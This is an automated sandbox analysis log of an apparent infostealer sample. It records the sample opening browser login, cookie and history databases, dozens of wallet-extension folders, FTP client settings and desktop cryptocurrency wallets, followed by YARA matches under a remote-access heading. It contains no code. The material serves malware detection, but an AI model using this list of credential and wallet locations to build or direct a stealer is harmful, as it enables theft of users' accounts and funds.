Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: number of queries: 1001
Source: Yara match File source: 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs